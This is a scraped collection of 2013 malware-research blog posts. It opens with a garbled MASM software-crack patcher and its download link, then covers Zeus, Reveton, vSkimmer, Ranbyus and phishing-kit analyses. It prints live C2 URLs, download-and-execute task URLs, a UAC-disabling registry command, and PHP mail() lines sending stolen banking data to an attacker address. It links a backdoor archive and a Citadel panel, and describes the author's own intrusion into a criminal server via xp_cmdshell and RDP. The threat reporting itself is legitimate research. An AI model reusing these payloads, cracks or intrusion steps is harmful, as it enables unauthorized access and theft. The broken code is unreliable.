    invoke SendDlgItemMessage,hWnd,IDC_LISTBOX,WM_VSCROLL,SB_BOTTOM,0
    Ret
ListEndP

Patch proc hWnd:HWND
    invoke GetFileAttributes,addr SecondN
    .ifeax!=FILE_ATTRIBUTE_NORMAL
        invoke SetFileAttributes,addr SecondN,FILE_ATTRIBUTE_NORMAL
    .endif
    invoke CreateFile,addr SecondN,\
                    GENERIC_READ+GENERIC_WRITE,\
                    FILE_SHARE_READ+FILE_SHARE_WRITE,\
                    NULL,\
                    OPEN_EXISTING,\
                    FILE_ATTRIBUTE_NORMAL,\
                    NULL
    .ifeax!=INVALID_HANDLE_VALUE
        mov hTarget,eax
            invokeList,hWnd,addr Searching
        invoke SetFilePointer,hTarget,PatchOffset,NULL,FILE_BEGIN
        invoke ReadFile,hTarget,addr RBuffer,64,addr BytesRead,NULL
        .if BytesRead==64
            moveax,dwordptr[RBuffer]
            .ifeax==dwordptr[Sequence]
                 invoke SetFilePointer,hTarget,PatchOffset,NULL,FILE_BEGIN 
            ;    invoke CopyFile, addr TargetN, addr BackupName,TRUE
                 invoke WriteFile,hTarget,addr WBuffer,64,addr BytesWritten,NULL
                .if BytesWritten==64
                 invokeList,hWnd,addr Backup
                 invokeList,hWnd,addr Success
                .else
                 .endif
                 .elseifeax==dwordptr[WBuffer]
                invokeList,hWnd,addr Version
                invokeList,hWnd,addrNothing
            .endif
        .endif
    .else
        invokeList,hWnd,addr Searching
        invokeList,hWnd,addr OpenError
        invokeList,hWnd,addrNothing
    .endif
    invoke CloseHandle,hTarget
    Ret
               
Patch EndP

end xstart

rsrc.rc:
;This Resource Script was generated by WinAsm Studio.

#define IDC_STATIC2011 2011
#define IDC_BYTES 2012
#define IDC_GROUPBOX2013 2013
#define IDC_GROUPBOX2015 2015
#define IDC_GROUPBOX2016 2016

2000 ICON DISCARDABLE "RED.ico"
124 DISCARDABLE "manifest.xml"
300 CURSOR DISCARDABLE "Crystal Clear arrow.cur"

101 DIALOGEX 0,0,311,136
FONT 8,"MS Sans Serif"
STYLE 0x80c00880
EXSTYLE 0x00000008
BEGIN
    CONTROL "RED CREW",IDC_GROUPBOX2013,"Button",0x50000007,3,3,304,130,0x00000000
    CONTROL "Control",IDC_GROUPBOX2016,"Button",0x50000007,230,65,64,59,0x00000000
    CONTROL "Status",IDC_GROUPBOX2015,"Button",0x50000007,13,65,214,59,0x00000000
    CONTROL "Patch",2001,"Button",0x50010000,240,77,42,13,0x00000000
    CONTROL "About",2003,"Button",0x50010000,240,92,43,13,0x00000000
    CONTROL "Target:",2004,"Static",0x50000001,13,15,23,10,0x00000000
    CONTROL "",2006,"Edit",0x50010881,13,25,281,11,0x00000200
    CONTROL "Exit",2002,"Button",0x50010000,240,108,43,13,0x00000000
    CONTROL "",1002,"ListBox",0x50010140,20,77,201,38,0x00000200
    CONTROL "URL:",IDC_STATIC2011,"Static",0x50000000,13,40,41,10,0x00000000
    CONTROL "",IDC_BYTES,"Edit",0x50010081,13,49,281,11,0x00000200
END

102 DIALOGEX 10,10,206,113
FONT 8,"Tahoma"
STYLE 0x90480800
EXSTYLE 0x00000000
BEGIN
END

manifest.xml:
<?xmlversion="1.0"encoding="UTF-8"standalone="yes"?>
<assemblyxmlns="urn:schemas-microsoft-com:asm.v1"manifestVersion="1.0">
  <assemblyIdentityversion="1.9.2.0"processorArchitecture="x86"name="NoName"type="win32"/>
  <description>NoDes</description>
  <dependency>
    <dependentAssembly>
      <assemblyIdentitytype="win32"name="Microsoft.Windows.Common-Controls"version="6.0.0.0"processorArchitecture="x86"publicKeyToken="6595b64144ccf1df"language="*"/>
    </dependentAssembly>
  </dependency>
</assembly>

The end.
Don't hesitate to show examples of codes if you are motivated.
No password on archive because nothing is infected.

And if you want some fun: InjectMe #1, InjectMe #2

Other tutorials (in French sorry)
Etude sur l'indétection du Server de Bifrost 1.2d auprés des Antivirus
ShmeitCorp Memento 6: StartClean Patcher

Package download: http://temari.fr/PackageHex.zip



Image may be NSFW.
Clik here to view.

IceIX/Zeus Red/Zeus

January 20, 2013, 3:47 pm
$
0
0
Some C&C of Zeus found in the wild.

Let's start with IceIX:
• dns: 1 ›› ip: 78.131.222.67 - adresse: POWIAT-LANCUT.COM.PL
Login:
Image may be NSFW.
Clik here to view.

Summary statistics:
Image may be NSFW.
Clik here to view.

OS:
Image may be NSFW.
Clik here to view.

Bots:
Image may be NSFW.
Clik here to view.

Scripts:
Image may be NSFW.
Clik here to view.

Search in database:
Image may be NSFW.
Clik here to view.

Search in files:
Image may be NSFW.
Clik here to view.

Jabber notifier:
Image may be NSFW.
Clik here to view.

Information:
Image may be NSFW.
Clik here to view.

Options:
Image may be NSFW.
Clik here to view.

'Zeus red':
Image may be NSFW.
Clik here to view.

Summary statistics:
Image may be NSFW.
Clik here to view.

OS:
Image may be NSFW.
Clik here to view.

Dynamic config (webinjects)
Image may be NSFW.
Clik here to view.

Options:
Image may be NSFW.
Clik here to view.

Black theme but with different theme it look like this,
Red:
Image may be NSFW.
Clik here to view.

Blue:
Image may be NSFW.
Clik here to view.

Green:
Image may be NSFW.
Clik here to view.

Matrix:
Image may be NSFW.
Clik here to view.

I noticed also a Multi Locker on the hijacked server:
Image may be NSFW.
Clik here to view.

Image may be NSFW.
Clik here to view.

4 chars root password, not sure if joke or human stupidity.
Image may be NSFW.
Clik here to view.


Fake Cloudflare:
Image may be NSFW.
Clik here to view.


Image may be NSFW.
Clik here to view.

Decoded:
Image may be NSFW.
Clik here to view.


Lame multiple Zeus:
• dns: 1 ›› ip: 5.135.179.88 - adresse: JAVADOWNLOAD.SYTES.NET
• dns: 1 ›› ip: 5.135.179.88 - adresse: CONNECTTOME1.SYTES.NET
• dns: 1 ›› ip: 5.135.179.88 - adresse: TESTPANEL.SYTES.NET

Login:
Image may be NSFW.
Clik here to view.

Summary statistics:
Image may be NSFW.
Clik here to view.

OS:
Image may be NSFW.
Clik here to view.

Scripts:
Image may be NSFW.
Clik here to view.

Summary2:
Image may be NSFW.
Clik here to view.

Summary3:
Image may be NSFW.
Clik here to view.

Jabber:
Image may be NSFW.
Clik here to view.


access.log:
87.177.174.133 - - [09/Jan/2013:15:19:41 +0100] "GET /zpanel/cp.php?m=reports_db HTTP/1.0" 302 - "-" "Mozilla/5.0"
87.177.175.210 - - [10/Jan/2013:05:44:08 +0100] "GET /zpanel/cp.php?m=reports_db HTTP/1.0" 302 - "-" "Mozilla/5.0"
No logs file available from 10/Jan/2013:16:13:51 to 13/Jan/2013:03:46:31
87.177.162.192 - - [13/Jan/2013:09:53:42 +0100] "GET /zpanel/cp.php?m=reports_db HTTP/1.0" 302 - "-" "Mozilla/5.0"
87.177.189.240 - - [14/Jan/2013:09:59:07 +0100] "GET /zpanel/cp.php?m=reports_db HTTP/1.0" 302 - "-" "Mozilla/5.0"
87.177.185.200 - - [15/Jan/2013:05:43:01 +0100] "GET /new/cp.php?m=reports_db HTTP/1.0" 302 - "-" "Mozilla/5.0"
87.177.169.81 - - [16/Jan/2013:13:37:18 +0100] "GET /zpanel/cp.php?m=reports_db HTTP/1.0" 302 - "-" "Mozilla/5.0"
87.177.161.20 - - [17/Jan/2013:08:25:56 +0100] "GET /zpanel/cp.php?m=reports_db HTTP/1.0" 302 - "-" "Mozilla/5.0"
87.177.187.177 - - [18/Jan/2013:14:37:36 +0100] "GET /new/cp.php?m=reports_db HTTP/1.0" 302 - "-" "Mozilla/5.0"
87.177.172.7 - - [19/Jan/2013:09:33:44 +0100] "GET /new/cp.php?m=reports_db HTTP/1.0" 302 - "-" "Mozilla/5.0"
87.177.183.21 - - [20/Jan/2013:12:34:49 +0100] "GET /zpanel/cp.php?m=reports_db HTTP/1.0" 302 - "-" "Mozilla/5.0"



Image may be NSFW.
Clik here to view.
Heavy snow in France.. i'm sick, une petite pensée pour ceux qui se lèvent tôt.

Trojan:Win32/Reveton

January 22, 2013, 12:09 pm
$
0
0
[root@heretyghyuiiiojk www]#
What a cool hostname.

Image may be NSFW.
Clik here to view.

Just the basic, landing for Italian ransom.
Image may be NSFW.
Clik here to view.

And traces of german landing
Image may be NSFW.
Clik here to view.

Code comments and variables name are in english
Image may be NSFW.
Clik here to view.

By looking the code source of pages i've see that "shared.php" is used as panel with GET req only
Image may be NSFW.
Clik here to view.

DB content:
Image may be NSFW.
Clik here to view.

Codes:
Image may be NSFW.
Clik here to view.
There is also a feature to erase vouchers.

vSkimmer, Another POS malware

January 25, 2013, 11:19 am
$
0
0
When i've view this post, content was already removed and member Banned.
Image may be NSFW.
Clik here to view.

vSkimmer - Virtual Skimmer

Functions:
- Track 2 grabber
- HTTP Loader (Download & Execute)
- Update bot itself

Working Modes:
- Online: If internet is reachable it will try to bypass firewalls and communicate to a the control panel.
- Offline: If internet is not reachable it wait for a specific pendrive/flashdrive plugged in and copy logs to it.

Server coded in PHP (can be modified on request to send logs to remote server, via smtp, etc.. )
Client coded in C++ no dependencies, 66kb, cryptable. (can be customized)

Image may be NSFW.
Clik here to view.
Image may be NSFW.
Clik here to view.
Image may be NSFW.
Clik here to view.

The malware check the presence of debugger:
Image may be NSFW.
Clik here to view.

Get PC details (OS,Computer name, GUID for identify you in the POS botnet, etc..)
Image may be NSFW.
Clik here to view.

Check if the file is executed from %APPDATA% if not add registry persistence, firewall rule, make a copy and execute the copy:
Image may be NSFW.
Clik here to view.

Detail of the registry persistence:
Image may be NSFW.
Clik here to view.

Firewall rule to allow the malware:
Image may be NSFW.
Clik here to view.

Create a mutex, thread and get host information:
Image may be NSFW.
Clik here to view.

Check for process:
Image may be NSFW.
Clik here to view.

Some are whitlisted: "System", smss.exe, csrss.exe, winlogon.exe, services.exe, lsass.exe, svchost.exe, spoolsv.exe, wscntfy.exe, alg.exe, mscorsvw.exe, ctfmon.exe, explorer.exe:
Image may be NSFW.
Clik here to view.

And when finally a process is found:
Image may be NSFW.
Clik here to view.

Read the process and search for pattern:
Image may be NSFW.
Clik here to view.

If nothing found:
Image may be NSFW.
Clik here to view.

Get infos, Base64 and call the gate via GET request:
Image may be NSFW.
Clik here to view.

Answer:
Image may be NSFW.
Clik here to view.
• dns: 1 ›› ip: 31.31.196.44 - adresse: WWW.POSTERMINALWORLD.LA

Parse the answer:
Image may be NSFW.
Clik here to view.

Answer is reduced to first 3 letters and compared with 'dlx' (Download & Execute) and 'upd' (Update) if one of these are found that mean the bad guys send us an order.

For example dlx:
Image may be NSFW.
Clik here to view.

Order is executed and a response is send to the server:
Image may be NSFW.
Clik here to view.

The part i love with pos malware:
Image may be NSFW.
Clik here to view.

Or just a simple ";1234567891234567=12345678912345678900?" in a txt but it's more gangsta to swipe a card.
So the algo detect the pattern, the track2 is encoded to base64
Image may be NSFW.
Clik here to view.

 And sent to the panel:
Image may be NSFW.
Clik here to view.

Now for the offline mode, get drive:
Image may be NSFW.
Clik here to view.

The flash drive must be named "KARTOXA007" (dumps in russian)
Image may be NSFW.
Clik here to view.

Image may be NSFW.
Clik here to view.

Create dmpz.log:
Image may be NSFW.
Clik here to view.

Now let's have a look on the panel:
Image may be NSFW.
Clik here to view.

POS Terminals:
Image may be NSFW.
Clik here to view.

Dump download:
Image may be NSFW.
Clik here to view.

Commands:
Image may be NSFW.
Clik here to view.

Settings:
Image may be NSFW.
Clik here to view.

Dumped.. :)
Image may be NSFW.
Clik here to view.

Sample:
https://www.virustotal.com/file/bb12fc4943857d8b8df1ea67eecc60a8791257ac3be12ae44634ee559da91bc0/analysis/1358237597/
Unpack:
https://www.virustotal.com/file/4fba64ad3a7e1daf8ca2d65c3f9b03a49083b7af339b995422c01a1a96532ca3/analysis/1358238314/
Thanks Zora for the sample :)

TowPow BulletProof Affiliate

January 26, 2013, 8:18 am
$
0
0
Search

Trojan.Win32/Spy.Ranbyus

January 27, 2013, 2:01 am
$
0
0
 Received a mail with an interesting exe
https://www.virustotal.com/file/17a3ee51492b9b2ba155f54be61f2c305b090cee8d604d1df616ca3ba881b372/analysis/1359049655/
Thanks creep.
This bot is used by one group of Russian carders and is not for sale, they call it 'triton'

IDA Map file imported to Olly, without IDA i got huge problem to understand the exe:
Image may be NSFW.
Clik here to view.

Injects:
Image may be NSFW.
Clik here to view.

Decoded strings (some, not everything):
&pp=1
reg add "
&files=1
nabagent.exe
putty.exe
[MOUSE R %dx%d]
POST
SeShutdownPrivilege
UniStream.exe
cbsmain.exe
HKLM\
jawt.dll
&net=1
disk%u.xml
&scrn=1
&cmd=1
UZ.DB3
GET
iexplore.exe
ThunderRT6FormDC
com.bifit.harver.core.DocumentBrowserFrame
drweb.exe
nabwatcher.exe
WINNT
bc_loader.exe
avfwsvc.exe
[VK_END]
.iBank*
aswupdsv.exe
%s\tmp%xa%04d.$$$
\/servlets\/ibc
bclient.exe
EnableLUA
secring
client7.exe
Western Union® Translink™
Tiny Client-Bank
/bsi.dll
Content-type: multipart/form-data, boundary=%s
Edit
java.exe
sign.key
\\.\PhysicalDrive0
inbank-start-ff.exe
http://([^:/]+):*([^/]*)(.+)
Content-Disposition: form-data; name="data"; filename="1"
clbank.exe
BBClient.exe
WS2_32.DLL
ComSpec
iscc.exe
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
avengine.exe
https:\/\/ibank.alfabank.ru
WebMoney Keeper Classic » Âõîä
a:\keys.dat
https:\/\/ibank.prbb.ru
oncbcli.exe
logs
nortonantibot.exe
ContactNG.exe
BUTTON
wclnt.exe
ashwebsv.exe
mj=%u&mi=%u&pt=%u&b=%u&dc=%u
sgbclient.exe
cbsmain.dll
avmailc.exe
Software\Microsoft\Windows NT\CurrentVersion\
winlogon.exe
webmoney.exe
egui.exe
/c del
--%s--
auth-attr-\d+-param1=.*&auth-attr-\d+-param2=.*
intpro.exe
vshwin32.exe
firefox.exe
mcshield.exe
Password:
nabmonitor.exe
UNIStream®. Àóòåíòèôèêàöèÿ.
Software\Microsoft\Windows\CurrentVersion\Policies\System
&file=2
http://e71koapi.org/lc5dx/index.php
rclient.exe
.jks
cfp.exe
translink.exe
http://pulden376-seven3.in/doEst71beG/index.php

Content-Transfer-Encoding: binary
ntvdm.exe
SysDebug32
%s?id=%s&session=%u&v=%u&name=%s
&av=
avp.exe
System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
cmdagent.exe
WINSCARD.DLL
" /v EnableLUA /t REG_DWORD /d 0 /f
bankcl.exe
Software\Microsoft\Windows\CurrentVersion
safari.exe
avconsol.exe
elbank.exe
username=.*&password=.*
pubring=(.*)
javax.swing.JFrame
secring=(.*)
javaw.exe
ISClient.exe
JVM.DLL
bk.exe
http://([^:/]+)/.+
auth-attr-\d+-param1=(.*)&auth-attr-\d+-param2=([^&]*)
ekrn.exe
sched.exe
avgnt.exe
avwebgrd.exe
startclient7.exe
master.key
avsynmgr.exe
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

Aleksandr Matrosov know better than me this threat go have a look his article: http://blog.eset.com/2012/12/19/win32spy-ranbyus-modifying-java-code-in-rbs

Let's do directly to the panel...

Login:
Image may be NSFW.
Clik here to view.

Statistics:
Image may be NSFW.
Clik here to view.

Active bots with smartcard:
Image may be NSFW.
Clik here to view.

Screenshots (SR):
Image may be NSFW.
Clik here to view.

Clicking on a random day:
Image may be NSFW.
Clik here to view.

A screenshot took by the bot:
Image may be NSFW.
Clik here to view.

Filelist (FL):
Image may be NSFW.
Clik here to view.

 File (F):
Image may be NSFW.
Clik here to view.

 Keys (K):
Image may be NSFW.
Clik here to view.

 Bot informations:
Image may be NSFW.
Clik here to view.

 Orders to send:
Image may be NSFW.
Clik here to view.

Image may be NSFW.
Clik here to view.

Download list:
Image may be NSFW.
Clik here to view.

Some task urls:
hxxp://whispers.ru/upload/term.exe
hxxp://178.18.249.11/cono.exe
hxxp://hoombauls.com/cono.exe
hxxp://deluxe1924.com/cc/d.exe
hxxp://deluxe1924.com/cc/car2.exe
hxxp://hoombauls.com/cono.exe
hxxp://gramma.pro/update.exe
hxxp://girgrozn.narod2.ru/01/CONO.exe
hxxp://deluxe1924.com/cc/picpic.exe
hxxp://gramma.pro/update.exe
hxxp://deluxe1924.com/cc/fun2101.exe
hxxp://www.mobi-sys.ru/en/lox.exe
hxxp://likeme.pro/update.exe
hxxp://ejdovberk.org/MRD.exe
hxxp://www.enmtp.com/admin/lunt30.exe
hxxp://178.18.249.10/exel.exe
hxxp://deluxe1924.com/cc/picpic.exe
hxxp://orlik.pro/update1.exe
hxxp://whispers.ru/upload/MLN1.exe
hxxp://www.enmtp.com/admin/termclean.exe
hxxp://www.enmtp.com/admin/IMRD.exe
Some files can be found here: http://vxvault.siri-urz.net/ViriList.php?IP=209.61.202.242

 Hide:
Image may be NSFW.
Clik here to view.

 Lookup:
Image may be NSFW.
Clik here to view.

 add:
Image may be NSFW.
Clik here to view.

 Banks:
Image may be NSFW.
Clik here to view.

Download:
Image may be NSFW.
Clik here to view.

 Comments:
Image may be NSFW.
Clik here to view.

 Others:
Image may be NSFW.
Clik here to view.

 Search via IP:
Image may be NSFW.
Clik here to view.

Search via ID:
Image may be NSFW.
Clik here to view.

 Daemon:
Image may be NSFW.
Clik here to view.

Update:
Image may be NSFW.
Clik here to view.

Settings:
Image may be NSFW.
Clik here to view.

Phish-BankFraud (EDF+CAF)

January 28, 2013, 3:32 am
$
0
0
These time our guys target CAF and still EDF.
Phishing redirector:
http://www.phishtank.com/phish_detail.php?phish_id=1711740 > 0/33
CAF phishing: http://www.phishtank.com/phish_detail.php?phish_id=1711743
$MooT.="blackdevilops@gmail.com";
$Meknes.="------------------------------\n";

$s4iir="CAF REZULT";
$sii="From:$fr";

mail($MooT,$s4iir,$Meknes,$sii);

EDF: http://www.phishtank.com/phish_detail.php?phish_id=1711741
$zobob.="blackdevilops@gmail.com";
$zobab.="------------------------------\n";

$s4wir="[FR]--->$zabab | $fr";

$sii="From: Particulier Rezult";

And as usual some php mailers and backdoors.
Image may be NSFW.
Clik here to view.

Image may be NSFW.
Clik here to view.

Emails reply from users to phisher, some are gold :)))
Image may be NSFW.
Clik here to view.
---
Image may be NSFW.
Clik here to view.
---
Image may be NSFW.
Clik here to view.
---
Image may be NSFW.
Clik here to view.
---
Image may be NSFW.
Clik here to view.
---
Image may be NSFW.
Clik here to view.
---
Image may be NSFW.
Clik here to view.
---
Image may be NSFW.
Clik here to view.
---
Image may be NSFW.
Clik here to view.
---
Image may be NSFW.
Clik here to view.
---
Image may be NSFW.
Clik here to view.
---
Image may be NSFW.
Clik here to view.
---
Image may be NSFW.
Clik here to view.

---
Image may be NSFW.
Clik here to view.
---
Image may be NSFW.
Clik here to view.
---
Image may be NSFW.
Clik here to view.
---
Image may be NSFW.
Clik here to view.
---
Image may be NSFW.
Clik here to view.
---
Image may be NSFW.
Clik here to view.

---
Image may be NSFW.
Clik here to view.

---
Image may be NSFW.
Clik here to view.


Shells and mailer can be found here: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=2410&start=10#p17890
And phishing pages (EDF+CAF) here: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=2431#p17887



Image may be NSFW.
Clik here to view.

Disk Antivirus Professional

January 31, 2013, 2:38 am
$
0
0
According to S!Ri:
Disk Antivirus Professional is a fake anti-spyware tool. It displays fake alert messages, prevent execution of legit programs and detects inexistent infections to scare users.
It is a clone of System Progressive Protection, Live Security Platinum, Smart Fortress 2012, Smart Protection 2012, Personal Shield Pro.


Image may be NSFW.
Clik here to view.

To register (and help removal), enter this serial code: AA39754E-715219CE

Note for reverse engineers ~
Image may be NSFW.
Clik here to view.

Image may be NSFW.
Clik here to view.

Sample: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=75#p17936



Image may be NSFW.
Clik here to view.

64.85.233.8

February 1, 2013, 8:47 am
$
0
0
bl4kj.zapto.org - astound-64-85-233-8.ca.astound.net - 64.85.233.8
http://vxvault.siri-urz.net/ViriList.php?s=0&m=40&IP=64.85.233.8
http://malwaredb.malekal.com/index.php?domaine=64.85.233.8
http://www.phishtank.com/phish_detail.php?phish_id=1718067

Malware lists:
http://pastebin.com/rp9u4Bzd
Found also my 'ransom unlocker' php, SpyEye loader and a folder named 'Xylibot' with some malicious php...
I don't know who you are but:
Image may be NSFW.
Clik here to view.
Image may be NSFW.
Clik here to view.


Finally started to use my Raspberry Pi.
Image may be NSFW.
Clik here to view.

Petroleum POS malware ?

February 1, 2013, 10:27 am
$
0
0
Recently aaSSfxxx posted an interesting file on kernelmode
Image may be NSFW.
Clik here to view.

a POS malware loaded via Andromeda according to him.
I've asked him to write something so i will not explain you the life about how this malware work, have a look here: http://aassfxxx.infos.st/article21/pos-malware-ram-scrapper

But like i've told him on comment... root the fucker !
The bad guys run a windows server, track2 are sent on it (or shits grabbed, i've not reversed the exe so i don't know what is grabbed actually)
have to thanks him for the bad configuration who allow you to enable xp_cmdshell (LOL)

Image may be NSFW.
Clik here to view.
asp backdoor... can be downloaded from rootkit.net.cn/code/aspxspy2.rar
VT: 31/46

RDPwned:
Image may be NSFW.
Clik here to view.

Users:
Image may be NSFW.
Clik here to view.

No more IIS please
Image may be NSFW.
Clik here to view.

They even use cracked app:
Image may be NSFW.
Clik here to view.

  Proto  Local Address          Foreign Address        State
  TCP    93.170.130.109:443     98:43166               ESTABLISHED
  TCP    93.170.130.109:56161   UBUNTU:microsoft-ds    ESTABLISHED
  TCP    93.170.130.109:56360   mail:60586             SYN_SENT
  TCP    127.0.0.1:1433         genuine:54808          ESTABLISHED
  TCP    127.0.0.1:1433         genuine:56348          TIME_WAIT
  TCP    127.0.0.1:54808        genuine:ms-sql-s       ESTABLISHED
  TCP    127.0.0.1:56349        genuine:ms-sql-s       TIME_WAIT
  TCP    127.0.0.1:56350        genuine:ms-sql-s       TIME_WAIT
  TCP    127.0.0.1:56351        genuine:ms-sql-s       TIME_WAIT
  TCP    127.0.0.1:56352        genuine:ms-sql-s       TIME_WAIT
  TCP    127.0.0.1:56353        genuine:ms-sql-s       TIME_WAIT
  TCP    127.0.0.1:56354        genuine:ms-sql-s       TIME_WAIT
  TCP    127.0.0.1:56355        genuine:ms-sql-s       TIME_WAIT
  TCP    127.0.0.1:56356        genuine:ms-sql-s       TIME_WAIT
  TCP    127.0.0.1:56357        genuine:ms-sql-s       TIME_WAIT
  TCP    127.0.0.1:56358        genuine:ms-sql-s       TIME_WAIT

Stuff grabbed:
Image may be NSFW.
Clik here to view.
More than 600 strings inside.

Not related but also fun (cf: @MalwareScene):
INSERT INTO `bots` (`id`, `last_ip`, `last_online`, `new`, `version`, `traffic`, `command`, `regdate`) VALUES
('1', '84.22.122.6', 1299217483, 0, '8.0.0b', 1337, 'demo', '0000-00-00 00:00:00');

inetnum:        84.22.122.0 - 84.22.122.255
netname:        A84-22-122-0
descr:          REPUBLIC CYBERBUNKER INFRASTRUCTURE
role:           Ministery of Telecommunications
address:        One CyberBunker Avenue
address:        CB-31337
address:        CyberBunker-1

And finally... another idiot leaving stuff, including the latest panel of Citadel.
Image may be NSFW.
Clik here to view.
hxtp://monstercvv.cc/Citadel%201.3.5.1.zip
Viewing all 128 articles
Browse latest View live
Search